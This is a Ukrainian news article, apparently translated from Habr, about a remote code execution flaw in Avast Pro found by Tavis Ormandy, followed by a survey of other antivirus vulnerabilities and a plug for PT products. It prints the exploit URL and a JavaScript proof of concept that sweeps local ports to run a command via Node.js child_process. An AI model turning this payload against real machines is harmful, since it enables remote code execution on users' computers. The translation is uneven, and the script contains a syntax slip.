Критична уразливість в антивірусі avast pro дозволяє здійснювати віддалене виконання коду



Дослідник з команди Google Project Zero Тэвис Орманди (Tavis Omandy) опублікував інформацію про критичну уразливість в антивірусі avast pro. Як з'ясував експерт, помилка в коді програмного продукту призводила до запуску консолі налагоджувальної Node.js — з його допомогою зловмисники могли відправляти команди для віддаленого виконання на комп'ютери з встановленим антивірусом. Сам Орманди у своєму повідомленні назвав помилку «безглуздою».

Для експлуатації уразливості зловмисникові потрібно відправити запит виду:

http://localhost:50820/json/new/?javascript:require('child_process').spawnSync('calc.exe')


Орманди також написав код простого экслоита:

<script>
var port = 49152;
var maxport = 60000;
var concurrent = 128;

function nextPort()
{
var img = document.createElement('IMG');
img.alt = "Testing " + port + "...";
img.src = "http://127.0.0.1:
+ port++
+ "/json/new/?"
+ "javascript:require('child_process')"
+ ".spawnSync('calc.exe')";

img.onload = img.onerror = function(e) {
document.body.removeChild(e.target);
nextPort();
}

if (port < maxport) {
document.body.appendChild(img);
}
}

for (i = 0; i < concurrent; i++)
nextPort();

</script>



Повідомлення дослідника з'явилося 22 березня, а трохи більше тижня тому, 30 березня компанія випустила патч, який частково закриває помилку — її не вдалося усунути повністю, проте були вирішені «найбільш критичні проблеми».

Крім того, компанія випустила заяву, в якому розповіла, що помилку схильні тільки «споживчі» продукти, а не технології для корпоративних замовників. Текст заяви приводит британське видання The Register.

За останній рік це вже не перший випадок виявлення серйозних вразливостей в захисному програмному забезпеченні і атак на антивірусні компанії. На початку лютого 2016 року той же дослідник Тэвис Орманди виявив серйозні уразливості в антивірусному продукті Malwarebytes. Оновлення Kaspersky Antivirus не були підписані за допомогою цифрового підпису компанії і завантажувалися по незахищеному HTTP-з'єднання — це робило користувачів схильними MiTM-атакам.

Крім того, раніше в червні 2015 року в ЗМІ потрапила інформація про те, що британські та американські спецслужби шукали уразливості продуктах «Лабораторії Касперського». Приблизно в той же час дослідники з Google Project Zero рассказали про серйозної уразливості в антивірусі ESET NOD32, яка дозволяла атакуючому читати, змінювати і видаляти будь-які файли на комп'ютерах яких встановлений антивірус.

Влітку того ж року стало відомо про те, що в продукті Symantec Endpoint Protection виявлено цілий ряд серйозних вразливостей, які дозволяли зловмисникам здійснювати обхід аутентифікації, підвищення привілеїв, читання і запис файлів, а також здійснення SQL-ін'єкцій. Крім того, практично одночасно з цим було оголошено про те, що антивірусна компанія Symantec стала жертвою хакерської атаки, в результаті якої були викрадені паролі користувачів, які зберігалися у відкритому вигляді.

Пізніше восени 2015 року серйозні помилки безпеки були виявлено криптософте TrueCrypt, а ще через кілька місяців, у грудні того ж року критичні уразливості були також знайдено в антивірусі Avast.

Крім того, восени минулого року дослідник безпеки Мазін Ахмед опублікував дослідження, в ході якого йому вдалося виявити XSS-вразливості відразу в декількох популярних міжмережевих екранах. Ми перевірили самонавчальний міжмережевий екран PT Application Firewall на схильність описаним у роботі обходах захисту — всі представлені способи обходу були заблоковані екраном.

Для запобігання можливих проблем, пов'язаних з безпекою інструментів захисту, також можна використовувати засоби, що дозволяють ізолювати подібні рішення від інших систем, зберігши їх функціональність. Вирішувати цю задачу, наприклад, система виявлення шкідливих файлів і посилань PT MultiScanner.

Джерело: Хабрахабр

0 коментарів

Тільки зареєстровані та авторизовані користувачі можуть залишати коментарі.